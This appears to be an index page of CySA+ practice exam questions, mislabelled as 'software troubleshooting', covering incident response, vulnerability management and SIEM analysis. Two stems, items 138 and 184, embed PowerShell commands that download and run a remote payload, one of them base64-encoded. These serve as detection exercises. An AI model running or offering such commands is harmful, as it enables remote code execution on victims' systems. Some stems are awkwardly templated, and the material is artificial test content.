CS0-004 · domain
software troubleshooting
Practise CompTIA CySA+ CS0-004 software troubleshooting practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.
Focused practice
Practice software troubleshooting questions
Scored sessions drawing only from this domain — pick a length below.
Start 20-question practice test →What this domain covers
What to know about software troubleshooting
software troubleshooting questions test whether you can apply the concept in context, not just recognise a definition.
How the topic appears in realistic exam-style scenarios.
Which detail in the question changes the correct answer.
How to eliminate plausible but wrong options.
How to connect the question back to the wider exam objective.
Watch out for
Common software troubleshooting exam traps
- ▸Answering from memory before reading the full scenario.
- ▸Missing a constraint such as cost, availability, security, scope or command context.
- ▸Choosing a broad answer when the question asks for the most specific fix.
- ▸Ignoring why the wrong options are tempting.
Question index
All software troubleshooting questions (701)
Click any question to see the full explanation, or start a practice session above.
A security analyst needs to present vulnerability scan results to a non-technical manager. Which of the following is MOST important to include?
Easy2During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?
Easy3Refer to the exhibit. The output is from a Linux system running `netstat -an`. Which of the following ports is likely being used for remote command-and-control communication?
Easy4An analyst identifies a security policy violation during a routine audit. The violation does not pose immediate risk. Which of the following is the BEST way to report this finding?
Medium5When performing digital forensics, which of the following represents the correct order of volatility from most volatile to least volatile?
Medium6A mid-sized e-commerce company uses a multi-cloud environment with AWS and Azure. The vulnerability management team performs monthly authenticated scans using a commercial scanner. During the last scan, a critical remote code execution vulnerability (CVE-2023-XXXX) was identified on an EC2 instance running a legacy application. The application owner states that the instance cannot be patched immediately because the patch would break compatibility with a third-party API. The instance has direct internet access and handles PCI data. The CISO wants to reduce risk to an acceptable level within 48 hours. Which course of action should the analyst recommend?
Easy7A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?
Medium8A company uses a mix of Windows and Linux servers. The vulnerability scanner reports a critical remote code execution vulnerability in Apache Struts (CVE-2017-5638) on a web server located in the DMZ. This server is behind a load balancer with an identical twin server that does not appear vulnerable. The security team needs to implement immediate remediation while minimizing downtime. What should the analyst do?
Medium9A security analyst is reviewing a vulnerability scan report and notices a plugin that identifies a critical vulnerability with a CVSS v3.1 base score of 9.8. The CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which attack vector is indicated?
Easy10A vulnerability management team is evaluating a critical vulnerability in a legacy application that cannot be patched. The application is used by a small number of users internally. Which of the following is the best compensating control to reduce risk?
Hard11After a phishing incident, the security team wants to improve detection of similar attacks in the future. Which THREE actions should the team take as part of post-incident activity? (Choose THREE.)
Medium12An organization is preparing evidence for a compliance audit. Which of the following pieces of evidence would BEST demonstrate that a security control is effective?
Hard13Which THREE of the following are common containment techniques used during incident response?
Easy14An organization is implementing a patch management process. Which of the following is the BEST practice before deploying patches to production systems?
Easy15A security analyst is conducting a vulnerability assessment of a Kubernetes cluster. Which TWO of the following are common misconfigurations that could lead to security risks? (Select TWO.)
Medium16An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?
Easy17A company experiences a data breach involving personal data of EU citizens. Under GDPR, what is the maximum time frame to notify the supervisory authority?
Medium18During a vulnerability scan, an analyst identifies a plugin that reports a vulnerability with a CVSS v3.1 base score of 7.5. The vector string includes AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. Which of the following is the primary impact of this vulnerability?
Medium19A vulnerability scanner reports a plugin that identifies a web application vulnerability related to the failure to validate user input, allowing an attacker to inject malicious scripts that execute in other users' browsers. Which OWASP Top 10 category does this vulnerability fall under?
Medium20Which of the following BEST describes the purpose of a risk register in the context of reporting and communication?
Medium21During forensic analysis of a compromised Linux server, an analyst needs to acquire memory evidence. The server is running and the analyst has root access. Which of the following tools should the analyst use to capture the contents of RAM with the least impact on the system?
Hard22During incident response, the team identifies that an attacker used a compromised third-party vendor account to access the network. Which of the following should the team do first?
Medium23Which metric would best indicate the effectiveness of an organization's patch management program?
Easy24A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For stakeholder management, Which documentation or approval is required to keep the programme defensible?
Medium25During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first?
Medium26During an incident response engagement, a junior analyst asks the team lead about the purpose of a lessons learned meeting. Which of the following BEST describes the primary objective of this meeting?
Easy27During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies an alert indicating a high volume of outbound traffic from a critical server to an unknown IP address. Which of the following actions should the analyst perform FIRST?
Medium28A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the evidence source phase, Which evidence source best supports or refutes the detection?
Medium29An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?
Easy30Which of the following is an example of a behavioral indicator of compromise (IOC) observed during dynamic malware analysis?
Easy31A phishing simulation is conducted, and the click rate is reported to management. What does a high click rate indicate?
Medium32A security analyst is investigating a potential data breach. The analyst needs to preserve evidence before containment. Which of the following actions is MOST appropriate at this stage?
Medium33A security analyst is selecting tools for vulnerability management. Which THREE of the following are vulnerability scanning tools?
Easy34During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which of the following is the most appropriate next step?
Medium35A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?
Medium36A security analyst is evaluating a vulnerability with CVSS v3.1 base score: AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:N/A:N. Which of the following best describes the scope and impact of this vulnerability?
Hard37A SOAR playbook enriches suspicious IP addresses. Which enrichment sources are useful? (Choose two.)
Medium38An analyst is evaluating the performance of the security operations center (SOC). Which metric best indicates the team's ability to contain an active threat?
Hard39During a post-incident review, a security analyst identifies that the mean time to detect (MTTD) for incidents is significantly higher than the industry benchmark. Which THREE actions should the analyst recommend to improve detection capabilities?
Easy40During a security incident, a cybersecurity analyst must communicate with various stakeholders. Which TWO are appropriate internal escalation paths? (Select TWO.)
Medium41A security analyst is reviewing a containerized application for vulnerabilities. The analyst uses a container image scanner and identifies several issues. Which THREE of the following are common container and Kubernetes misconfigurations that the analyst should prioritize? (Choose three.)
Hard42Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?
Easy43An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot that balances containment with evidence preservation?
Medium44A SIEM receives endpoint, firewall, identity, and cloud logs for the same incident, but timestamps do not align across sources. Which actions should the analyst take before finalizing the timeline? (Choose two.)
Hard45A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?
Easy46An analyst suspects DNS tunnelling but wants to avoid over-escalating normal CDN behaviour. Which comparisons help? (Choose two.)
Hard47During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?
Medium48An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?
Hard49A security analyst is creating metrics for a security dashboard aimed at executive leadership. Which THREE metrics are most appropriate for this audience? (Select THREE.)
Easy50A vulnerability management team is prioritizing vulnerabilities for remediation. They have a list of vulnerabilities with different characteristics. According to best practices, which TWO factors should be considered when prioritizing vulnerabilities? (Select TWO.)
Medium51Match each analysis technique to its description.
Medium52During a security incident, a digital forensics investigator must preserve evidence according to best practices. Which three of the following actions align with proper forensic procedures? (Choose three.)
Medium53An organization uses automated patch management for workstations but manual patching for servers. After a critical vulnerability is announced, the security team wants to expedite patching for servers. Which of the following is the BEST approach?
Medium54After a security incident, which component of the incident report provides a chronological sequence of events from detection to recovery?
Medium55A security analyst is performing a vulnerability assessment and needs to identify potential misconfigurations in a Kubernetes cluster. Which TWO of the following are common Kubernetes misconfigurations that should be checked? (Select TWO.)
Medium56During a vulnerability assessment, a security analyst discovers a web application that is vulnerable to SQL injection. The application is a legacy system that cannot be easily patched. The analyst recommends implementing a web application firewall (WAF) rule to block malicious SQL patterns. Which type of control does this represent?
Medium57An organization is implementing configuration management and decides to use CIS Benchmarks to harden their servers. They choose Level 1 benchmarks for most servers but Level 2 for highly sensitive systems. What is the key difference between Level 1 and Level 2 CIS benchmarks?
Medium58A SOC analyst receives a file from an unknown source via email. The analyst wants to analyze the file without executing it to determine its functionality. Which type of analysis should be performed?
Medium59Which metric is commonly used to measure the average time it takes to identify that a security incident has occurred?
Easy60During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?
Hard61A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is technical remediation owner, which content choice is most appropriate?
Medium62After a phishing simulation, the security team wants to report the results to management. Which metric is most appropriate to include in the report?
Easy63A security analyst is setting up a vulnerability management program and needs to select tools for container image scanning. Which THREE of the following are commonly used container image scanning tools? (Select THREE.)
Easy64A security analyst at a small company notices that several workstations in the finance department are communicating with an external IP address known to be associated with a command-and-control server. The analyst checks the host-based firewall logs and sees that outbound connections to that IP are allowed. Which of the following is the BEST immediate action to take?
Medium65A security analyst needs to communicate the results of a vulnerability scan to different stakeholders. Which TWO of the following are appropriate reporting formats for executive-level stakeholders?
Medium66A CSIRT is following its incident response plan during a confirmed data breach. The team lead needs to ensure that all evidence collected is admissible in a future legal proceeding. Which of the following should the team lead implement FIRST?
Hard67A company uses Qualys to scan their internal network. The scan report shows a vulnerability with plugin output indicating that the server is running a version of Apache httpd vulnerable to CVE-2023-1234. The asset is a development web server that is not exposed to the internet. The CVSS score is 7.5 (High). However, the EPSS score is 0.001 (very low). Which of the following should be the primary factor in prioritizing this vulnerability?
Medium68A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the evidence source phase, Which evidence source best supports or refutes the detection?
Medium69A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?
Medium70A cybersecurity analyst is building a compliance dashboard for an upcoming audit. Which TWO metrics are most relevant for demonstrating effective patch management? (Select TWO.)
Easy71A company is implementing a security monitoring solution for its cloud infrastructure. The security team wants to detect attempts to disable logging on critical instances. Which of the following should be configured?
Medium72During the detection and analysis phase of an incident, an analyst identifies a file with a hash that matches a known malware signature. The analyst wants to enrich this IOC with additional context. Which resource is BEST suited for this enrichment?
Medium73A web application security tester uses Burp Suite to test an API endpoint. The tester sends a request with a modified HTTP method and discovers that the API accepts DELETE requests on an endpoint that should only allow GET. This is an example of which OWASP Top 10 vulnerability?
Medium74A security operations center (SOC) analyst receives an alert about a potential ransomware infection on a critical server. The incident response team needs to contain the threat quickly. Which of the following should be performed FIRST as a short-term containment measure?
Medium75After containing a malware outbreak, the incident response team performs static malware analysis on a suspicious executable. Which of the following artifacts would be most helpful in creating a YARA rule to detect variants of the malware?
Medium76An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot? In the alert triage phase, Which action gives the analyst the clearest next triage step?
Medium77During a forensic investigation, an analyst must acquire digital evidence while maintaining forensic soundness. Which THREE practices should the analyst follow? (Choose three.)
Hard78A security analyst is reviewing the results of a vulnerability scan. The scan identified several critical vulnerabilities on a web server that were previously reported three months ago. Which TWO actions should the analyst take to improve the vulnerability management process?
Medium79A security analyst is responding to a potential data exfiltration incident. As part of the containment strategy, the analyst must preserve evidence. Which TWO actions should the analyst take before containment? (Select two.)
Medium80A vulnerability management team uses OpenVAS to scan a network of 500 hosts weekly. The scans are causing network congestion and generating false positives. Which of the following would BEST reduce the impact while maintaining effective vulnerability detection?
Hard81A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?
Medium82A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?
Medium83A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?
Medium84An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?
Hard85A post-incident report finds that no one owned a failed alert integration. What should the corrective action include? If the primary audience is technical remediation owner, which content choice is most appropriate?
Hard86An analyst is reviewing scan results and finds that a critical vulnerability is present on 50 workstations. The vendor has released a patch, but the IT team is concerned about potential compatibility issues. Which of the following should the analyst recommend?
Medium87Order the steps to perform a vulnerability scan using a tool like Nessus.
Medium88A supplier provides a software product used in a regulated environment. The security team wants visibility into included libraries and versions. What should they request?
Easy89An organization uses Qualys for vulnerability scanning. After a scan, the security team identifies a vulnerability with an EPSS score of 0.95 and that appears in the CISA KEV catalog. However, the affected asset is a non-critical development server with no internet access. According to the vulnerability lifecycle, what should be the analyst's NEXT action?
Hard90A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?
Medium91A security analyst is reviewing a report from an authenticated vulnerability scan of a Windows domain controller. The report indicates multiple critical vulnerabilities related to Active Directory. The system administrator claims the patches have been applied. Which of the following is the MOST likely cause of the discrepancy?
Hard92A cybersecurity analyst is presenting risk findings to the board of directors. Which THREE types of impact should be emphasized to effectively communicate business risk? (Select THREE.)
Hard93During a web application penetration test, a security analyst uses a DAST tool and discovers that the application is vulnerable to Server-Side Request Forgery (SSRF). According to the OWASP Top 10 2021, under which category does SSRF fall?
Hard94Which TWO methods help ensure the accuracy of security metrics reported to management?
Medium95During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?
Medium96A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?
Easy97During a security incident, a CySA+ analyst needs to communicate the status to the CISO. Which type of report is most appropriate for this purpose?
Medium98Which of the following is the best example of a Key Performance Indicator (KPI) for patch management?
Easy99A security analyst must present a risk assessment to the board of directors. Which approach is most effective for communicating technical risks?
Medium100During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, an analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which step should the analyst perform next to validate the alert?
Easy101Which metrics best show SOC detection and response effectiveness? (Choose two.)
Medium102A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?
Hard103A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?
Medium104An organization is implementing a patch management process. Which THREE of the following are essential steps that should be included before deploying patches to production systems? (Select the three best answers.)
Hard105A company is implementing a patch management process. Which of the following steps should be performed FIRST after a vendor releases a security patch for a critical vulnerability?
Medium106An endpoint is actively beaconing to a known malicious IP and spawning credential-dumping tools. The business owner wants evidence preserved. What is the BEST containment action? In the detection engineering phase, Which detection or tuning approach would reduce noise without losing the signal?
Hard107A CSIRT is investigating a ransomware incident that encrypted files on multiple servers. The team needs to determine the initial infection vector. Which THREE pieces of evidence should the team prioritize collecting? (Select three.)
Hard108A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?
Medium109A security analyst is conducting static analysis of a suspicious executable. Which of the following tools or techniques is BEST suited for extracting strings and viewing the import table?
Medium110A company's IDS generated an alert for a potential SQL injection attack on a web application. The security analyst reviews the alert and confirms that the application is protected by a Web Application Firewall (WAF) that filters SQL injection attempts. Which of the following is the best course of action?
Easy111During a compliance audit, the auditor requests evidence of access reviews. Which of the following would be the MOST appropriate evidence to provide?
Medium112A company is implementing a vulnerability management program. Which of the following are essential components of a vulnerability management lifecycle? (Choose three.)
Easy113Which TWO of the following are best practices for distributing security reports to stakeholders?
Medium114A cybersecurity analyst is preparing a post-incident report for a data breach that affected multiple business units. Which three of the following elements should be included in the report to ensure effective communication and support future prevention? (Choose three.)
Medium115A company wants to automate the deployment of security patches to endpoints. Which of the following tools would BEST support this requirement?
Easy116After containing a security incident, the incident response team conducts a root cause analysis. Which of the following is the PRIMARY purpose of this activity?
Medium117An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?
Medium118An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?
Easy119A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?
Medium120A security analyst is preparing an incident report after a ransomware attack. Which two components must be included in the report? (Select TWO.)
Medium121During a security incident, which of the following should be the FIRST communication to internal stakeholders?
Medium122Which type of threat intelligence report is most appropriate for communicating long-term trends and strategic risks to senior executives?
Hard123A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?
Easy124A company uses a SIEM platform that ingests logs from various sources. The SOC team receives an alert for a high number of failed login attempts (over 100 in 5 minutes) on the domain controller from a single IP address. The analyst investigates and finds that the failed attempts are for multiple different usernames, including some disabled accounts. The source IP is traced to an external VPN service. The analyst also notices that a few accounts had successful logins from the same IP after the failed attempts. Which of the following is the MOST likely attack type?
Hard125A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is business service owner, which content choice is most appropriate?
Hard126A phishing incident led to credential theft. Which containment actions are appropriate? (Choose two.)
Medium127A penetration testing team has completed an internal assessment and provided a report with several high-risk findings. One finding indicates that a web application is vulnerable to SQL injection. The application is used by external customers to submit orders. The development team has reviewed the finding and states that it will take three weeks to fix the code and deploy a patch. The security operations center (SOC) has observed increased scanning activity targeting the application's IP address from external sources. The company's risk tolerance for web application vulnerabilities is low. Which of the following should the analyst recommend as the immediate next step?
Easy128A security analyst is configuring a compliance scan for a Linux server using CIS Benchmarks. The analyst must ensure the server meets Level 1 benchmarks. Which of the following is a characteristic of CIS Level 1 benchmarks?
Medium129After a DDoS attack, the incident response team wants to improve detection and prevention. Which of the following metrics would be MOST useful for evaluating the effectiveness of the response?
Medium130A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?
Hard131A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?
Medium132A vulnerability report includes a risk acceptance section. Which of the following scenarios is most appropriate to include in this section?
Medium133A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?
Medium134After containing a ransomware outbreak, the incident response team needs to restore encrypted files. They have verified clean backups from two weeks ago, but some critical files were modified on the day of the attack. What is the best approach?
Hard135A security analyst notices that a system is sending a large amount of data to an external IP address via DNS tunneling. Which containment technique is most appropriate?
Medium136Which component of an incident report describes the sequence of events from detection to resolution?
Easy137A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?
Medium138An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
Hard139An organization is preparing evidence for an audit of access controls. Which THREE types of evidence should be collected? (Select THREE.)
Medium140An end-user reports receiving an email with an unexpected attachment and urgent language requesting to click a link. Which TWO indicators confirm this is likely a phishing email?
Easy141A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?
Easy142A SOC is onboarding endpoint logs into a SIEM. Which fields are most important for process-chain investigations? (Choose three.)
Medium143A security analyst has identified a large number of false positives in a vulnerability scan report. Which of the following is the BEST way to reduce false positives in future scans?
Easy144During an incident, the security team discovers that customer personally identifiable information (PII) was exfiltrated. Which of the following notifications must be made according to GDPR?
Hard145A company wants to ensure that all servers are patched within 30 days of a critical patch release. The security team must verify compliance without causing downtime. Which of the following is the best approach?
Medium146A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is executive leadership, which content choice is most appropriate?
Hard147Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?
Easy148During a post-compromise review, a company wants to test whether legal, PR, IT, and executives understand their roles during a ransomware incident without touching production systems. What exercise is best? During post-incident improvement, which decision is most defensible? which action should be prioritized before closure?
Hard149An organization's security team receives an alert about a potential ransomware infection on a critical server. The severity classification is 'high' because the server supports a production database. According to the incident response plan, which containment action should be taken first to minimize data loss?
Medium150A security team is deploying a new web application and wants to ensure it follows secure configuration practices. Which THREE of the following are recommended configuration settings according to CIS benchmarks for web servers? (Select THREE.)
Medium151A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?
Medium152A security analyst is performing static analysis on a suspicious PE file. Which initial step should the analyst take to understand the file's imports and potential capabilities?
Medium153During a forensic investigation, an analyst needs to acquire disk images from multiple suspect drives. Which THREE practices ensure forensic soundness? (Select THREE)
Hard154A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured? For control selection, Which control best addresses the stated weakness without hiding risk?
Easy155A security analyst reviews a vulnerability scan report and identifies a critical vulnerability with a CVSS v3.1 base score of 9.8. The attack vector is 'Network', attack complexity is 'Low', privileges required is 'None', user interaction is 'None', scope is 'Unchanged', and all three CIA impacts are 'High'. Which additional factor should the analyst prioritize when deciding whether to apply a patch or a compensating control?
Medium156A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?
Easy157An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?
Medium158A cybersecurity analyst is preparing an incident report after a data breach. Which TWO components are essential to include? (Select TWO.)
Medium159A vulnerability scan identifies a critical unauthenticated remote-code-execution flaw on an internet-facing VPN appliance that is actively exploited in the wild. Several internal-only medium vulnerabilities are also present. What should be remediated first? For validation, Which action should be taken before closing or downgrading the finding?
Easy160After a ransomware incident, the incident report includes lessons learned. Which of the following is the BEST example of a lesson learned?
Medium161A security analyst is reviewing a vulnerability scan report that includes a plugin output with the following CVSS v3.1 vector: AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H. Which of the following best describes the characteristics of this vulnerability?
Hard162A security analyst discovers that a data breach involving personally identifiable information (PII) of European Union citizens occurred two weeks ago but was not detected until now due to a monitoring gap. The company is subject to GDPR, which requires notification to the relevant supervisory authority within 72 hours of becoming aware of the breach. The analyst reports this to the CISO, who decides to delay notification for another week to prepare a more comprehensive response. The analyst believes this violates regulatory requirements. The analyst has documented the breach details and is concerned about the legal and financial penalties for non-compliance. The company's legal department has a strong compliance focus. The analyst has a duty to escalate within the organization. The organization has a whistleblower policy and an ethics hotline. What should the analyst do?
Hard163Which sources improve asset criticality context for vulnerability prioritization? (Choose two.)
Medium164A CISO wants a concise incident update during active containment. Which elements should be included? (Choose three.)
Medium165During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?
Hard166During a vulnerability assessment, a security analyst discovers that a network device is running an outdated firmware version with known exploits. The device is critical to production and cannot be rebooted during business hours. Which of the following is the BEST approach to remediate this vulnerability?
Medium167During incident response, a team isolates a host but needs to preserve volatile evidence. What should be done first?
Medium168During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?
Hard169After a major security incident, a post-incident review reveals that communication between the SOC and the network operations center (NOC) was slow and unclear. Which document should be updated to improve future incident response?
Medium170A security analyst is reviewing the output of a vulnerability scan and notices that a critical vulnerability on a Linux server has been reported as 'Confirmed' by the scanner. The analyst checks the system and finds that the actual vulnerability does not exist because a kernel upgrade was applied via a yum update but the scanner did not detect the change. Which of the following is the MOST likely cause?
Hard171A security analyst is configuring a container image scanning tool. Which of the following tools is specifically designed for container image vulnerability scanning?
Easy172An organization has experienced a data breach involving personal information of EU residents. The incident response team is preparing communications. Which THREE of the following are mandatory actions under GDPR? (Select THREE.)
Hard173A vulnerability management team is prioritizing remediation of a list of vulnerabilities. They want to incorporate the likelihood of exploitation based on real-world exploit activity. Which of the following data sources should they use?
Easy174A security analyst is preparing a compliance report for an upcoming audit. The auditor has requested evidence of access controls. Which TWO of the following would provide appropriate evidence? (Select TWO.)
Medium175A security analyst is performing dynamic analysis of a suspicious file in a sandbox. Which of the following observations is most indicative of ransomware behavior?
Hard176A cybersecurity analyst is configuring a vulnerability scanning policy for a mixed environment of Linux servers and Windows workstations. The analyst wants to minimize disruption to production services while ensuring comprehensive coverage. Which approach is BEST?
Hard177You are a senior security analyst at a mid-sized financial company. The SOC has been alerted by the EDR system about anomalous behavior on a domain controller (DC) that runs Windows Server 2019. The alert indicates that a process named 'svchost.exe' spawned a PowerShell process that executed a one-liner to connect to an external IP address (203.0.113.5) over TCP port 443. Further investigation shows that the DC's event logs have gaps of about 10 minutes each, and the local administrator account 'Administrator' was used to log in from a workstation named 'WKSTN-FIN-12' at the time of the event. The company has strict policies: all administrative access must be via dedicated jump hosts, and privileged accounts are monitored. Upon checking, 'WKSTN-FIN-12' is assigned to an employee in the finance department who has no administrative privileges. The employee reports that they did not log in recently. The CISO wants a swift containment and eradication without losing forensic evidence. Based on this scenario, which of the following is the BEST first course of action?
Hard178A tabletop exercise reveals that no one knows who can approve public statements. What should be updated? (Choose two.)
Medium179An organization is implementing an incident response plan. Which phase of the NIST SP 800-61 lifecycle includes activities such as creating policies, establishing IR teams, and acquiring necessary tools?
Easy180During a post-incident review, the team identifies that the incident response plan was not followed correctly due to unclear communication channels. Which recommendation BEST addresses this issue?
Hard181A small business with 50 employees uses a single Windows Server 2019 as a domain controller and file server. The company recently experienced a ransomware attack that encrypted all files on the server. The IT manager restored the files from a backup that was taken two days before the attack. However, the next day, the files were encrypted again. The analyst suspects the ransomware may have persisted or re-entered. The network is air-gapped from the internet, but employees use USB drives. Which of the following is the MOST likely reason for the re-infection?
Easy182During an active incident, a security analyst discovers that the attacker has exfiltrated data. The analyst must communicate this to the incident response team. Which method of communication is MOST appropriate?
Hard183After a risk assessment, a security analyst recommends accepting a low-risk finding. The system owner disagrees. Which communication strategy should the analyst use?
Medium184An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?
Hard185A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured to enable the scan to test authenticated pages?
Easy186A remediation report shows repeated SLA breaches by one business unit. Which recommendations are appropriate? (Choose two.)
Hard187A detection engineer is writing a Sigma rule for suspicious rundll32 usage. Which fields should be included? (Choose two.)
Medium188A security analyst is investigating a potential data breach. The analyst needs to collect digital evidence while preserving its integrity. Which TWO actions should the analyst take? (Choose TWO.)
Medium189An organization's incident response team is classifying an incident based on severity and priority. Which TWO factors should the team consider when determining the priority of an incident? (Select TWO.)
Easy190Match each vulnerability scanning concept to its definition.
Medium191A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is SOC manager, which content choice is most appropriate?
Medium192An analyst is using YARA to create rules for detecting a specific malware strain. Which of the following pieces of information is MOST useful for writing a YARA rule?
Medium193A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For validation, Which action should be taken before closing or downgrading the finding?
Medium194An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?
Medium195Which THREE of the following are common indicators of a data exfiltration attempt? (Choose three.)
Hard196Which TWO of the following are key components of an incident communication plan?
Easy197A security analyst is using the EPSS to prioritize vulnerabilities for remediation. EPSS is designed to estimate the likelihood that a vulnerability will be exploited in the wild. Which of the following best describes how EPSS should be used in vulnerability management?
Easy198A security analyst is evaluating a containerized application for vulnerabilities. The analyst runs Trivy on the container image and finds several high-severity vulnerabilities in the base image. Which of the following is the most effective remediation strategy?
Hard199A security analyst is investigating a Kubernetes cluster and finds that a container is running with securityContext.privileged: true. The container also has a hostPath mount that allows writing to the host filesystem. Which of the following best describes the primary risk of this configuration?
